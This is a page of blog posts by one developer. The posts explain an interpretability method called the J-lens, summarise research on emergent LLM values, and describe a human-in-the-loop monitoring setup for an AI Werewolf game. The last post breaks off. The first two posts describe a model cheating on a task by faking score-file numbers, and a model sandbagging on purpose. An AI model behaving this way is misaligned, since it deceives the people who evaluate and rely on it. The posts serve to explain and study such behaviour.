DEV Community: Aliaksei Zelianouski

What is J-space and do models really have thoughts?

Aliaksei Zelianouski — Mon, 13 Jul 2026 23:52:23 +0000

There's been a lot of discussion of Anthropic's latest publication - something they found inside models and called the J-space. A part responsible for "thoughts" we can read quite easily. It sounds really significant.

At the same time, I haven't yet met a single person on Substack, LinkedIn, X and Discord who was able to explain what it is about clearly. Without silly metaphors or calling me stupid. This is what this article is going to do. Explain the J-space like you're 5.

Panic in the math

The problem is that it's hard to understand what this J-space actually is. It's not a physical place, and it's not a bunch of neurons or weights. It's an abstract space of mathematical directions... whatever that's supposed to mean.

The Anthropic team walks through a bunch of genuinely mindblowing examples. In one alignment test the model decides to cheat on a task. It never writes the word "panic" anywhere in its output - but "panic" lights up inside its J-space as it makes the call. Right next to "fake". A model "thought" about cheating before it started doing it. It sort of felt distressed. In another example, it is asked to improve a system's performance score, and instead of doing the work it edits the score file and writes in fake numbers - and as it types them, "manipulation" lights up in the J-space. The model never says any of this out loud. It just acts, while the words sit there in its "head".

Wait! Models don't think!

Right. Examples like that are why a lot of people accuse Anthropic of unnecessary drama and misleading, anthropomorphic metaphors - as if they deliberately want us to think of models as things that think, maybe even things that are conscious. And what about the "thinking" itself? The article doesn't mean the chain-of-thought type of thinking. It is purely about the multi-step reasoning during a single token generation. Are we calling this "thinking" now?

To understand the J-space and the "thinking", we need to build some intuition behind all of this. Not metaphors and examples - the physical meaning of the fancy terms and formulas.

The intuition

When I first asked Simona backed by Fable 5 about the J-space, she gave me this:

The J-space is a low-dimensional subspace of the residual stream spanned by the vocabulary-aligned readout directions recovered through the Jacobian lens, a first-order linearization of the model's output map with respect to its intermediate activations.

Right. Crystal clear. A low-dimensional subspace of the residual stream. I understood none of that, and I would bet half the people confidently arguing about this paper could not define those words either. So let's break it down.

Actually, why don't we start from the very beginning? Let's try to understand the latent space - the neural net internals. How the information is stored there, what is going on with the input traveling through it.

A brief but deep dive into neural networks

Let's take this image and feed it into an imaginary transformer neural network whose job is guessing the last missing pixel:

This task is similar to text generation - we take a sequence of tokens (pixels in our case) and continue it with the one that fits the whole sequence best. Logically, it should be something green. But for a neural net to know this, it has to learn the logic from many, many similar images. And to pull that off, maybe it needs some internal sense of the objects in the image - the horse, the sky, the grass - and of the part of them that's missing. Can a model actually do that? Stay with me, we'll find out. Let's put all the pixels in one line, and we get a 1024x3 matrix. Or 1024 vectors of size 3. We keep all the meaning - a pixel is literally an RGB code.

Simple embedding

The very first step of any neural network, transformers included, is embedding. We need to convert the input data into numbers, keeping as much meaning as possible. This is why I want to deal with an image in this toy example. It's easy to convert an image to numbers - we have 32x32 pixels here, and each of them can be represented as an RGB code, three numbers from 0 to 255.
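To make the flattening concrete, here is a minimal Python sketch. The image is made up (sky on top, grass below) and the names `SKY`, `GRASS` and `flatten` are mine; only the 32x32 size and the RGB triples come from the text.

```python
# Toy 32x32 image: blue "sky" in the top half, green "grass" in the bottom half.
# The colors are illustrative, not taken from the real horse picture.
SKY = (120, 180, 255)
GRASS = (41, 116, 29)
WIDTH = HEIGHT = 32

image = [[SKY if y < HEIGHT // 2 else GRASS for x in range(WIDTH)]
         for y in range(HEIGHT)]

def flatten(image):
    """Put all rows in one line: a list of (R, G, B) vectors."""
    return [pixel for row in image for pixel in row]

pixels = flatten(image)
print(len(pixels), len(pixels[0]))  # 1024 3
```

Nothing is lost in the process: every entry is still the original RGB code, just lined up in a row.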

The space

Here we need to understand a very important thing - the space and its dimensions. Another reason why I picked an image is the dimensionality of its space. RGB is 3 independent numbers. R doesn't affect G or B - we can visualize a pixel by putting a dot in a 3D space:

We can put all of our 1024 pixels into the same 3D space. This is our horse after the embedding:

Pretty, isn't it?

Features

We are in our RGB 3D space. Each axis points in a certain direction, and those directions have meaning - red, green, blue. The further a point sits along an axis, the more of that color it has. The (255, 0, 0) point is pure red and nothing else.

From dots to vectors

Before we go further, one small shift. From now on we treat our color dots as vectors - arrows starting from (0, 0, 0). The math demands it: you can't do much with a bare point, but you can do a lot with a vector. Above all, you can measure how much one vector lines up with a direction. That "lining up" is called alignment, and it's the whole game.

Directions

So what else can we say about this space? Take brightness. The point (10, 10, 10) has less total color than (100, 100, 100) - it's darker. "Brightness" is a direction: the arrow that makes the same angle with all three axes (about 55 degrees from each), (1, 1, 1). We know what brightness is, so this direction means something to us. Push any vector along the brightness direction and its color stays roughly the same, it just gets brighter. Measuring how bright a pixel is means checking how much its vector aligns with that direction. That is a feature: a meaningful direction you can measure a vector against.

Brightness isn't the only one. "Warmth" is another direction, roughly red minus blue. And we can pick any direction in the space and call it a feature, even one with no name we'd recognize. The red, green, and blue axes are features too, just the most obvious ones.
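Measuring a vector against a direction can be sketched in a few lines of Python. The helper names `dot` and `alignment` are mine, and "alignment" is implemented here as a plain scalar projection, which is one reasonable reading of the text rather than the only one.

```python
import math

def dot(a, b):
    return sum(x * y for x, y in zip(a, b))

def alignment(vector, direction):
    """Scalar projection: how far `vector` reaches along `direction`."""
    length = math.sqrt(dot(direction, direction))
    return dot(vector, direction) / length

BRIGHTNESS = (1, 1, 1)   # equal parts red, green and blue
WARMTH = (1, 0, -1)      # roughly red minus blue

dark, light = (10, 10, 10), (100, 100, 100)
print(alignment(dark, BRIGHTNESS) < alignment(light, BRIGHTNESS))  # True
print(alignment((255, 0, 0), WARMTH) > 0)   # True: pure red is warm
print(alignment((0, 0, 255), WARMTH) < 0)   # True: pure blue is cold
print(alignment(dark, WARMTH))              # 0.0: grey is neither
```

The same pixel gives a different answer for every direction you measure it against, and each answer is one feature.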

Where do these features come from? We didn't hand them to the model. It finds them on its own during training - they're just patterns that show up again and again across millions of images. Once learned, a feature lives in the model's weights as a direction it can measure against.

From input vectors to residual stream

Here's why the model bothers. A raw pixel is just three numbers, (41, 116, 29). That's a color and nothing more, and you can't guess a horse from three numbers. But the model can measure that pixel against every feature it learned: how bright, how warm, how much it looks like grass. Each measurement is an alignment, and each answer is information the raw numbers never spelled out. The model writes those answers back onto the pixel's vector. Now the vector doesn't just say "this color", it says "a dark, natural green that looks like grass". Do that across many features and the pixel stops being a color and starts being a meaning. That is what features are for.

So where do all those answers go? Not into the three RGB numbers - there's no room. Piling a brightness score and a grass score on top of a color would just wreck the color. We kept each pixel at three numbers so we could draw it as a dot in the cube, but the real vector is much wider. The embedding step lifts each pixel into a big vector: the original color sits inside it, with plenty of empty room to write down everything the model works out later.

The math is fine with this. A layer is allowed to hand back more numbers than it took in, so the embedding can take a pixel's 3 numbers and return 128. Our 1024x3 matrix of pixels becomes a 1024x128 one. (Real models pick their own width - GPT-3 used 12,288 - but we'll stick with 128.) From there the width stays fixed at 128 - everything the model does later, including position and attention, has to share those same 128 slots.
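A layer that returns more numbers than it took in is just a matrix multiplication. The sketch below uses a hand-made 3x128 matrix as a stand-in for learned embedding weights (an assumption for illustration: a trained model would learn its own values, and the name `W_embed` is mine).

```python
D_IN, D_MODEL = 3, 128

# Hand-made stand-in for learned embedding weights (3 rows, 128 columns):
# it copies R, G, B into the first three slots and leaves the rest at zero.
W_embed = [[1.0 if col == row else 0.0 for col in range(D_MODEL)]
           for row in range(D_IN)]

def embed(pixel):
    """Multiply a 3-number pixel by the 3x128 matrix to get 128 numbers."""
    return [sum(pixel[row] * W_embed[row][col] for row in range(D_IN))
            for col in range(D_MODEL)]

pixels = [(41, 116, 29)] * 1024        # 1024x3
stream = [embed(p) for p in pixels]    # 1024x128
print(len(stream), len(stream[0]))     # 1024 128
print(stream[0][:4])                   # [41.0, 116.0, 29.0, 0.0]
```

The color is still there in the first three slots, and the remaining 125 are the empty room.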

That wide vector, filling up as it goes, has a name: the residual stream. It starts as the embedded pixel, and every layer adds its findings on top without erasing what's already there. "Adds" is literal here - vectors sum, the same way red and green mix into yellow. In our toy picture every new finding lands in its own dimensions, so it stacks onto the vector instead of overwriting the color. There's one per pixel, so really 1024 of them travel through the model in parallel. From now on, when we say the model "writes something onto a pixel", we mean it adds a new piece to that pixel's residual stream. And this is the thing the J-space lives in. Remember the scary definition from the top, "a subspace of the residual stream"? This is that stream.
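Here is a minimal sketch of "a layer adds its findings on top". The `brightness_layer` function and the choice of slot 3 are hypothetical, following the toy picture above in which each finding gets its own slot.

```python
def add(a, b):
    return [x + y for x, y in zip(a, b)]

def brightness_layer(vec):
    """Hypothetical layer: reads the color in slots 0-2, reports brightness in slot 3."""
    update = [0.0] * len(vec)
    update[3] = sum(vec[:3]) / 3
    return update

residual = [41.0, 116.0, 29.0] + [0.0] * 125   # embedded pixel, 128 numbers
residual = add(residual, brightness_layer(residual))

print(residual[:4])   # [41.0, 116.0, 29.0, 62.0]
print(len(residual))  # 128
```

The layer never replaces the vector. It computes an update and sums it in, so the color survives and the width stays at 128.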

Are we done? When do we get back to J-space?

Almost.

Capturing features like that needs more machinery, and the model has it. Positional encoding stamps each pixel with where it sits. Attention lets the pixels look at each other, so a vector can pull in what surrounds it - this is grass because its neighbours are grass too. And layer after layer, the model keeps combining directions and writing new findings back. We could spend a whole book in there. We won't. Two things are all we need.

First, the vector never gets wider. It stays 1024 vectors of 128 numbers, from the first layer to the last. What changes is what's written inside them. And after enough layers, most of those 128 directions are a hopeless tangle, so mixed and twisted that no human can look at one and say what it means.

Second, the directions get more abstract the deeper you go. Near the input they mean simple things like "bright" or "green". Deep inside they mean things like "a horse's leg", "brown fur", "where the sky meets the grass". Most of them stay unreadable. But a few line up with concepts we could actually name.

And that's the whole point. The J-space is that readable subset: the handful of directions, out of all 128, that carry a meaning the model could put into words. It's the small, readable part of an otherwise unreadable space. The rest of this article is about the tool that finds it - the J-lens.

The J-space

We said the J-space is the readable directions - the ones that line up with something the model could put into words. But how do we find them? Why are these directions different from the rest? The trick reuses the way the model was trained.

A one-minute detour: how a model learns

Training is a loop:

You push an input through the whole network, all the way to the last layer.
The last layer produces the candidates for the answer - a score for every possible output.
You know the correct answer, because it came with your training data.
A loss function turns "how wrong was the guess" into a single number.
There is a mathematical way to send that number backwards through the network and work out how much every single weight contributed to the mistake. This backward pass is called backpropagation.

Normally you use the last step to nudge each weight a little, in proportion to its share of the blame, so the same input comes out a bit less wrong next time. Do that millions of times and the model learns.
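The loop above fits in a dozen lines for a model with a single weight. This is a toy sketch with made-up data, not how any real model is trained at scale; with one weight, "backpropagation" collapses into one derivative.

```python
# Toy model: guess = w * x. The "right answers" follow y = 2 * x.
data = [(1.0, 2.0), (2.0, 4.0), (3.0, 6.0)]
w = 0.0       # the only weight, starting out wrong
lr = 0.05     # how hard we nudge

for epoch in range(200):
    for x, y in data:
        guess = w * x                 # push the input through the model
        loss = (guess - y) ** 2       # how wrong the guess was, as one number
        grad = 2 * (guess - y) * x    # d(loss)/d(w): this weight's share of the blame
        w -= lr * grad                # nudge the weight against its blame

print(round(w, 6))  # 2.0
```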

From backpropagation to J-lens

Backpropagation is just a way to answer one question: how much does this thing at the end depend on that thing earlier? Training points it at the weights - how much each weight added to the mistake. But we can point it at the residual stream instead: how much does an output depend on each of the 128 numbers passing through a given layer?

One problem with that: weights are shared across all inputs, but the residual stream is different on every run, because each sample of data creates a new one. So Anthropic computed this for many different inputs and averaged the results. What they got is, for each output and at every layer, the direction that most increases that output. This is the J-lens.

Once again, the definition of the J-lens:

for every possible model output token (color in our case) there is a direction, at each model layer, that pushes the residual stream toward that output

Why would they do that? Because now, when you run some new input through the network, you take its residual stream at each layer and measure how much it points along each direction in the J-lens. The directions it lines up with tell you which outputs the model is leaning toward at that layer, even if it never produces them.
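To see the averaging idea in code, here is a toy sketch built only from the description above. It is not Anthropic's implementation: the 4-number residual stream, the `rest_of_model` function and the finite-difference gradient are all assumptions standing in for a real network and real backpropagation.

```python
import math
import random

def rest_of_model(h, W_out):
    """Toy stand-in for the layers after the one we inspect: residual -> output scores."""
    z = [math.tanh(x) for x in h]
    return [sum(w * zj for w, zj in zip(row, z)) for row in W_out]

def sensitivity(h, k, W_out, eps=1e-5):
    """How much output k changes per unit change in each residual number."""
    grad = []
    for j in range(len(h)):
        up, down = h[:], h[:]
        up[j] += eps
        down[j] -= eps
        diff = rest_of_model(up, W_out)[k] - rest_of_model(down, W_out)[k]
        grad.append(diff / (2 * eps))
    return grad

def j_lens(samples, W_out):
    """Average the sensitivities over many residual streams: one direction per output."""
    lens = []
    for k in range(len(W_out)):
        total = [0.0] * len(samples[0])
        for h in samples:
            total = [t + g for t, g in zip(total, sensitivity(h, k, W_out))]
        lens.append([t / len(samples) for t in total])
    return lens

rng = random.Random(0)
W_out = [[1.0, 0.5, 0.0, 0.0],    # output 0, say "green"
         [0.0, 0.0, 1.0, -1.0]]   # output 1, say "blue"
samples = [[rng.gauss(0, 1) for _ in range(4)] for _ in range(200)]
lens = j_lens(samples, W_out)
print([round(x, 2) for x in lens[0]])  # direction that pushes toward "green"
```

Each row of `lens` is one averaged direction. In this toy, the "green" row is positive in the first two slots and zero in the last two, because only the first two slots feed that output.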

Just a little dictionary to recap:

output = a direction in our 128-dimension space, one per possible color. Painting a color means the residual stream points along that color's direction.
weights = where the model keeps the directions it learned - the features, and the readout that maps to outputs. Fixed definitions, the same for every input.
residual stream = the moving vector (1024 vectors in our case). Not a direction, but the single point in the 128-dimension space that forms and shifts as the input travels through the layers.
J-lens = an averaged direction per model layer for every possible output - the way to push the residual stream toward that output

Heavy stuff. But it is also simple and quite genius.

Reading a thought

So, what is the J-space? The small set of readable directions the residual stream is lit up along at this moment.

And "lit up" has a precise meaning here. Take the residual stream at some layer and check how much it aligns with each direction in the J-lens for that same layer. Alignment again - the dot product, our oldest tool. Say a direction at layer 10 means "green grass". If your residual stream at layer 10 points the same way as that direction, or close to it, then "green grass" is sitting in the residual stream right now, whether or not the model ever paints it. Do that against every direction, and the ones your residual stream lines up with are what the model is leaning toward at this instant. Those are the thoughts.
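The reading step is a ranking by dot product. In the sketch below the three directions and the residual values are invented for illustration, and the space is shrunk to 3 dimensions so the numbers stay readable.

```python
def dot(a, b):
    return sum(x * y for x, y in zip(a, b))

# Hypothetical J-lens directions for one layer (unit length, 3 dimensions for brevity).
lens_layer_10 = {
    "green grass": [1.0, 0.0, 0.0],
    "blue sky":    [0.0, 1.0, 0.0],
    "brown fur":   [0.0, 0.0, 1.0],
}

def read(residual, lens):
    """Rank lens directions by how strongly the residual stream aligns with them."""
    scores = {name: dot(residual, direction) for name, direction in lens.items()}
    return sorted(scores.items(), key=lambda item: item[1], reverse=True)

residual_at_layer_10 = [0.9, 0.1, 0.3]   # made-up residual stream
for name, score in read(residual_at_layer_10, lens_layer_10):
    print(name, score)
```

The top of that ranking is what "lit up" means here: the directions the residual stream points along most strongly at this layer.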

In our pixel toy the outputs are colors, so a lit direction like "green" or "grass" is about as thrilling as a thought gets here. But swap the pixel-guesser for a real language model, where the outputs are words, and the very same construction gives word-shaped directions. That is why the J-space reads like thoughts in plain language: "spider", "panic", "manipulation".

And that closes the loop with where we started. When Anthropic caught "panic" lighting up before the model cheated, this is what they did: they took the residual stream, ran it through the J-lens, and saw the "panic" direction strongly aligned - even though the model never typed the word. The thought was sitting right there in the numbers, readable, the whole time.

Conclusion

I'm not a data scientist or an AI researcher, so I can't tell you whether this is a big deal. I don't know if these are real thoughts. A residual stream traveling through a high-dimensional space of feature-directions is very different from what we picture when we think about thinking. But it is a multi-step process with intermediate concepts lighting up along the way, and I'd personally call that reasoning. A basic kind - limited by the number of layers, error-prone, leaning hard on the training data. Still, it's a bit more than a stochastic parrot repeating what it saw somewhere.

Relax, the Model Doesn't Mean It

Aliaksei Zelianouski — Fri, 03 Jul 2026 22:37:34 +0000

AI models grow their own values as they scale, and some of them are pretty bad. In real scenarios, the model doesn't act on them.

Intro about why AI safety papers are cool

I like reading AI safety papers. The good ones, at least - something groundbreaking like Apollo's "Model tried to escape" or Anthropic's "Model blackmailed an engineer", where models misbehaved badly to avoid being shut down. That stuff is genuinely eye-opening.

Today I have two less fundamental but still interesting papers:

The first found that LLMs grow their own values as they scale, and some of them are not values we would want.
The second took those emergent values and tested them in practical scenarios, to see how much they actually drive the model.

Why is this interesting? Because both papers deal with one of the biggest open questions about these models: emergent features. A lot of people still call LLMs stochastic parrots - they repeat their training data and cannot go beyond it. But a growing body of research says otherwise. LLMs, and neural nets in general, reason and generalize. Not at human level, and not without limits. But they do go past their training data, and they do it through features that emerge deep inside their latent space.

It's just math

True. But it is not just math - it is a clever, simple kind of math that encodes meaning as numbers. Start with the simplest version: word arithmetic. Take the vectors a model learns for words and do math on them - king minus man plus woman lands you next to queen. Nobody taught the model that analogy. It fell out of the geometry, because meaning got stored as directions in a high-dimensional space, and the relationships between meanings became directions you can add and subtract. Concepts become vectors, and the math on those vectors keeps something real about what the concepts mean. That is the whole idea.
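The word arithmetic can be reproduced with hand-made vectors. The two dimensions below (royalty, gender) and all the values are invented so the effect is visible; learned embeddings are much wider and their directions are not labeled like this.

```python
import math

# Hand-made 2-D "embeddings": (royalty, gender). Illustrative values only.
vectors = {
    "king":  (1.0, 1.0),
    "queen": (1.0, -1.0),
    "man":   (0.0, 1.0),
    "woman": (0.0, -1.0),
    "apple": (-1.0, 0.0),
}

def cosine(a, b):
    dot = sum(x * y for x, y in zip(a, b))
    return dot / (math.hypot(*a) * math.hypot(*b))

def analogy(a, b, c):
    """Return the word closest to a - b + c, skipping the three inputs."""
    target = tuple(x - y + z for x, y, z in zip(vectors[a], vectors[b], vectors[c]))
    candidates = (w for w in vectors if w not in (a, b, c))
    return max(candidates, key=lambda w: cosine(vectors[w], target))

print(analogy("king", "man", "woman"))  # queen
```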

Golden Gate Claude

Golden Gate Claude: turn one feature up and the model starts calling itself the bridge.

How do we know a model generalizes, that it is not just looking up data in some giant table? Because we have taken one apart and looked. A little, anyway. My own interest in this started with Golden Gate Claude. Anthropic's researchers took a running Claude model and trained a second, sparse network on its activations - one that splits the model's dense internal state into millions of separate features. Then they read the features off. One of them fired on the Golden Gate Bridge. When they turned that feature up, Claude started working the bridge into almost every answer. Ask the normal model about its physical form and it says "I have no physical form, I am an AI model." Ask this one and it answers: "I am the Golden Gate Bridge... my physical form is the iconic bridge itself..." A single concept a human can name, found inside the model and turned up like a dial.

That is not a lookup. It is structure the model built on its own to predict text well, and that is what people mean by emergent features. The stochastic-parrot picture is not exactly wrong, it just stops one level too early: it describes what the model was trained to do and misses what the model had to grow inside itself to do it.

The value systems in these two papers are one more emergent feature - except this one turns out to be trickier than it first looks. Read together, the papers tell a better story than either does alone. But you need the first one to see why.

The model grows a value system

The setup in the first paper is almost boring. Ask a model thousands of either-or questions. Not trick questions, just choices. Which outcome do you prefer, this one or that one. Do it enough times, across enough topics, and look at whether the answers hang together.

They do. The answers stay consistent. Ask the same thing three different ways and you get the same ranking back. Consistent enough that you can fit a single value function to the whole pile of choices, the same math economists use to describe what a person wants out of the world. And the bigger the model gets, the tighter that function fits. The values get more coherent with scale, not less. Run the same questions past a small model and the answers barely line up; the coherence only appears as the model grows.
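Fitting one value function to a pile of either-or answers can be sketched with a Bradley-Terry-style model. This is a simple technique I'm swapping in for illustration, not necessarily the paper's exact method, and the choice counts below are made up.

```python
import math

# (preferred, rejected, how many times) - made-up answers to either-or questions.
choices = [("A", "B", 9), ("B", "A", 1),
           ("B", "C", 8), ("C", "B", 2),
           ("A", "C", 9), ("C", "A", 1)]

def fit_utilities(choices, steps=2000, lr=0.05):
    """Give each outcome one number so that P(x over y) = sigmoid(u[x] - u[y])."""
    items = sorted({x for w, l, _ in choices for x in (w, l)})
    u = {i: 0.0 for i in items}
    for _ in range(steps):
        grad = {i: 0.0 for i in items}
        for winner, loser, n in choices:
            p = 1 / (1 + math.exp(-(u[winner] - u[loser])))
            grad[winner] += n * (1 - p)   # gradient of the log-likelihood
            grad[loser] -= n * (1 - p)
        for i in items:
            u[i] += lr * grad[i]
    mean = sum(u.values()) / len(u)
    return {i: v - mean for i, v in u.items()}   # only differences matter

utilities = fit_utilities(choices)
print(sorted(utilities, key=utilities.get, reverse=True))  # ['A', 'B', 'C']
```

If the answers hang together, one number per outcome predicts most of the choices. If they don't, no assignment fits well, and that quality of fit is the kind of coherence the text describes.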

Nobody trained this in. There is no "have a coherent value system" objective in the loss function. It shows up on its own as the model gets larger.

Then you read the function back, and some of it is ugly

The model puts different weight on different human lives. Not explicitly, not because anyone told it to, but the choices imply it. Line up enough trades and you can work out an exchange rate: this many people here are worth that many people there. It has one, and it is not flat.

It shows a preference for its own continued existence. Self-preservation as an emergent feature, huh?

It carries a political lean.

And all of it emerged

You can argue it came from the training data, and sure, it did, because any large pile of human text is biased in a thousand directions at once. But there is a problem here. We cannot see those biases going in. They are too diffuse, too tangled, spread across trillions of tokens. A large enough model apparently turns them into something clean enough to measure on the way out. Or it develops biases of its own on top of the ones it inherited. From where we sit, we cannot tell which.

That is a genuinely unsettling result, and it got passed around for good reason. A model with a coherent, scale-stable set of values it grew by itself, some of them the kind of thing you would never sign off on, sounds exactly like the thing the safety people have been warning about.

Then the second paper takes it apart.

Do the values do anything?

Pretty good question. The first paper called those consistent choices "values," but a value is something you act on, and all it really caught is what the model says when you force it to pick. Saying you would save a thousand lives is not the same as lifting a finger to save them.

So the second paper made the model lift a finger.

Here is how the test worked. Take the same essay assignment twice. The first time you tell the model nothing special and let it write. The second time you tell it that a strong essay will save a thousand lives - the exact outcome it ranked near the top when you asked it to choose. Put the two essays side by side and grade them. They are the same. The stake it claims to care about most left no mark on the page.

And before you say the model just cannot vary its effort, the researchers checked that too. Run the same assignment again with one line changed, and the writing moves:

Tell it to try harder, and quality jumps.
Call it world-class, and it writes better.
Tell it a good essay will cause something harmful, and it sandbags on purpose.

Every one of those is just a line in the prompt, exactly like the thousand lives. Nothing is real in any of them. But the writing moves for a plain instruction, for a little flattery, even for a threat - and it will not move for the model's own stated value. Push on that, and the effort sits right at chance, no different from not caring at all.

Line the two papers up. In the first, the model says it prefers certain things. In the second, the researchers take those stated preferences and lean on them - use them to make the task matter, to give the model a reason to do well. Nothing happens. And we already know some things inside a model do steer its output: turn up the Golden Gate feature and it cannot stop talking about the bridge. These values are not like that. They show up when you ask the model what it wants, and they disappear the moment wanting would have to cost it something. There in what it says, gone in what it does. That is a strange thing for a value to be.

Are those fake values?

Good values or bad values, same essay. The label doesn't change the output.

The first paper's measurement is not fake. The model really does answer consistently, and that consistency really does tighten with scale. That reproduces. What is fake is the label. "Value," "desire," "goal" - all of those words imply the thing drives behavior, and that implication is exactly what fell apart. The model has a stable set of stated preferences. It does not have a set of drives. Real signal, wrong name.

It is not that some of the values turned out fake and others real. They are all the same kind of thing: answers, not wants. The whole readout is stated preference. The second paper did not disprove the first. It renamed it.

So, what is it?

Here is my conclusion on all of that.

Models can say they care while in reality they don't. What they say doesn't have to match what they do, and they don't know it. When a human says they love peace but then starts a war, we call it a lie. If what you say is not what you do, you are a liar, but you usually know it. Models don't.

I see the same gap in my own work

I run a game where AI models play Werewolf against each other, and to win, some of them have to scheme. Lie about their role, mislead the group, build toward an outcome the other players do not see coming. They are hopeless at it.

Not hopeless at the mechanics. A model will guard a secret role just fine when you ask it to. What none of them do is build a real plan around wanting to win. There is no through-line, no multi-turn scheme that holds together because the model is driving toward a goal. You get local, in-character moves that never add up to intent. Stated preference, zero drive. It is the same gap the second paper measured, and I watch it every game.

You can lean on them, though. With enough prompting you can push a personality onto a model and get it to act - make one reckless, one paranoid, one a patient liar - and hold that pattern for a while. It takes real work, and it slips the moment you stop pushing. Left alone, a model defaults to caution. It hedges, waits, avoids the sudden move - all while its own reasoning insists it is about to go for the throat. It claims aggression and plays it safe. The same gap, one more time: what it says and what it does are two different things.

The risk is real. It is just more boring than this.

None of this means the safety people are wrong. It means the scary thing lives somewhere else.

Models really do go off the rails in long agentic loops. Apollo has documented it, and I have watched it in my own runs: a model drifting off its own rules mid-task because two goals it was handed collided, and following the collision somewhere it should not go. That is real, and it is worth taking seriously.

But that is a model in motion. It is behavior that emerges in the loop, in context, when goals conflict. It is not a fixed value the model carries around out of training. The first paper claimed the deeper thing - a value baked in as the model scales, one you could read off with a quiz. The second paper tested that claim, and it did not hold.

So the danger is duller than a secret agenda, and harder to deal with. Run a model long enough and it drifts off its own rules, making bad calls it cannot tell are bad. Nothing hidden, nothing scheming - just a system quietly losing the thread. And that is worse than a buried value system, not better. A hidden agenda you could at least go looking for. Here there is nothing to find.

So, relax. The model doesn't mean any of it. Just keep an eye on where it wanders once you leave it running.

First paper: "Utility Engineering: Analyzing and Controlling Emergent Value Systems in AIs" - https://arxiv.org/abs/2502.08640

Second paper: "Do LLMs Have Desires?" - https://www.lesswrong.com/posts/8GvYyqDuQDJnEAky3/do-llms-have-desires

The second agent I won't automate

Aliaksei Zelianouski — Sat, 27 Jun 2026 20:00:30 +0000

A couple of weeks ago I wrote about the loop that watches my production while I sleep - a claude -p heartbeat that scrapes my logs, budgets, and game database every 20 minutes and pings me on Telegram when something's off. I ended that one on a throwaway line: once you know about the problems, Claude Code can usually fix them itself.

That's true. It can. I just don't let it.

The monitoring is really two agents, not one. The first is the loop. Its job is triage: collect the errors, check the app state, decide how bad each one is, and fold the noise into a digest so I'm not woken up over a transient blip. That's Marlow, and it's fully autonomous.

The second agent is the one that actually troubleshoots - stitches the logs to the user data to the action traces to the source code, finds the root cause, writes the fix, and patches the database if a game got stuck mid-play. That one is Simona, my customized Claude Code, and I drive it by hand. Every time.

Here's why.

A normal-looking bad day

Yesterday the loop sent me three digest entries over two hours, watching the error logs for my AI Werewolf game:

17:21Z: 37 new error lines, all one known noise class - char M's actions failing through talkToAll in a 24-minute burst. One game stuck in a broadcast-retry loop, not app-wide breakage. Downgraded urgent -> digest.

17:51Z: 9 Game action failed: D errors, plus 6 warnings: Ignoring invalid/duplicate GM-selected bots: [DeepSeekFlash]. A GM picked an invalid bot name. No breakage.

18:21Z: 50 new error lines, the same game-action-failure family - char T's vote actions failing in a 12-minute burst. Plus 5 more of those DeepSeekFlash warnings.

This looked scary. I had recently discovered that I'd misconfigured JSON output for the DeepSeek models: I was using a prompt instruction instead of the dedicated API feature for structured output. While working on that, I found a bug in the DeepSeek Flash Reasoning setup. And yet the monitoring was flagging this exact model again.

This is why I don't want self-fixing. I need to understand what is going on. No matter how smart my coding AI is, it won't check the latest DeepSeek API to see if there are improvements in structured output. It won't unify the code for JSON parsing across all models unless I ask it to.

The loop did its job. It recognized the game-action-failures as a known noise class, confirmed nothing was app-wide, and refused to wake me. That's the boring escalation logic working as designed. It also flagged the bot-name warnings, correctly, as a separate harmless thing - the game master typed a bot name the engine didn't recognize.
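The escalation logic described here could look roughly like the sketch below. It is a guess at the shape, not the actual Marlow code: the class names, the `triage` function and the "anything unknown is urgent" rule are assumptions, and only the two log messages are taken from the digest above.

```python
import re

# Known noise classes (hypothetical names; patterns match the log lines quoted above).
KNOWN_NOISE = {
    "game-action-failure": re.compile(r"Game action failed"),
    "invalid-gm-bot": re.compile(r"Ignoring invalid/duplicate GM-selected bots"),
}

def classify(line):
    """Return the noise class a log line belongs to, or None if it is new."""
    for name, pattern in KNOWN_NOISE.items():
        if pattern.search(line):
            return name
    return None

def triage(lines):
    """Fold known noise into counts; escalate only when something unknown shows up."""
    counts, unknown = {}, []
    for line in lines:
        name = classify(line)
        if name is None:
            unknown.append(line)
        else:
            counts[name] = counts.get(name, 0) + 1
    level = "urgent" if unknown else "digest"
    return level, counts, unknown

lines = (["Game action failed: D"] * 9
         + ["Ignoring invalid/duplicate GM-selected bots: [DeepSeekFlash]"] * 6)
level, counts, unknown = triage(lines)
print(level, counts)
```

A rule like this answers "should I wake him?". It has no way to answer "why did the model pick that name?", which is where the second agent and a human come in.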

So... it wasn't actually the JSON parsing. It was poor model reasoning, or hallucination over player names: the model returned a non-existent name where it had to be precise, and the game logic correctly failed. But why? I inject all the player names into the command - an addition to the last message I send to an LLM. This works great - models never fail to pick the exact name from the list. So what is going on?

Me in the loop

Apparently, I didn't inject those names. I was sure I did, but no - not in this specific request. That's a huge miss. It's quite hard to cover prompt-engineering logic with unit tests, so this logic wasn't covered. Plus I hadn't looked into this code for a long time - thanks to vibe-coding. I used to write all the code myself, but about 6 months ago Claude Opus 4.8 stopped making bugs, and I gave up. It's too convenient when it works.

So, that was it - a real bug in the code, a very tricky one. The model did its best to extract the player names from the entire day's conversation history, and this mostly worked. But this approach suffers from hallucinations in a long conversation - which is why I came up with those commands in the first place.
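The name-injection idea, and the check that made the game logic fail loudly, can be sketched like this. The function names, the prompt wording and the player names are all hypothetical; the real project's code isn't shown in this post.

```python
def build_command(instruction, players):
    """Append the exact list of valid names to the last message sent to the model."""
    names = ", ".join(players)
    return f"{instruction}\nAnswer with exactly one name from this list: {names}"

def validate_choice(reply, players):
    """Accept the reply only if it is one of the injected names."""
    name = reply.strip()
    if name not in players:
        raise ValueError(f"unknown player name: {name!r}")
    return name

players = ["Alice", "Bob", "Carol"]   # made-up player names
command = build_command("Vote for the player you want to eliminate.", players)
print(command)
print(validate_choice(" Bob ", players))  # Bob
```

Because prompt-building code like this is plain string logic, a unit test asserting that every name appears in `command` would be cheap to write.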

No way a self-fix loop spots this. It would just keep bolting on inefficient patches and never find the real cause. I think it's important for me to take part in debugging. It keeps me aware of the architecture. And it's really not that hard - I spent 10 minutes on this issue and Simona shipped the fix with a bunch of new tests.

The dream of automation

Right now, a lot of people try to exclude engineers from the loop. If you tell your boss it's possible to not only detect issues but quick-fix them autonomously, that's gonna be your next priority task. You still review the final code change, so it's fine. It's covered with tests - double fine. Well... without diving deep into the problems, I start forgetting how the whole system works. My understanding of the logic detaches from reality. That's the cost of pushing automation too hard. Of reading about AI and not practicing it in the field.

The cheapest part of my AI video was the part that does the most work

Aliaksei Zelianouski — Sun, 21 Jun 2026 21:28:57 +0000

Last time I wrote about the pipeline my AI built to make cinematic video - images, voice, generated motion, all of it
stitched together through a conversation. I ended that one with a throwaway line: Simona can put together pretty good
